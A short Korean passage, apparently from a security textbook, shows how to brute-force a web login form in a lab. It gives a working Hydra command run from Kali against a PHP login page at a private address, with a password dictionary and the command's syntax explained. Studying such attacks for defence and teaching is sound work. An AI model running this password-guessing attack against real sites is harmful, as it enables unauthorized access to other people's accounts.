해당 구조를 파악했으면 다음과 같이 칼리에서 터미널을 열고 무차별 대입 도구를 통해 공격할 수 있다.

    칼리

    $ hydra -l admin -P /home/kaliuser/passwd.txt 192.168.100.11 http-post-form "/board/login_chk.php:id=^USER^&pw=^PASS^:fail" -V

    이 코드의 형식을 보면 다음과 같다.

    hydra -l [로그인 이름] -P [비밀번호 사전] [사이트 주소] [통신 방식] [Action 값/파라미터 정보:리턴 문자열]

     

    ▲ 그림 4-14 사전 파일(/home/kaliuser/passwd.txt)을 통해 admin 비밀번호를 찾아낸 화면

    신간 소식 구독하기
    뉴스레터에 가입하시고 이메일로 신간 소식을 받아 보세요.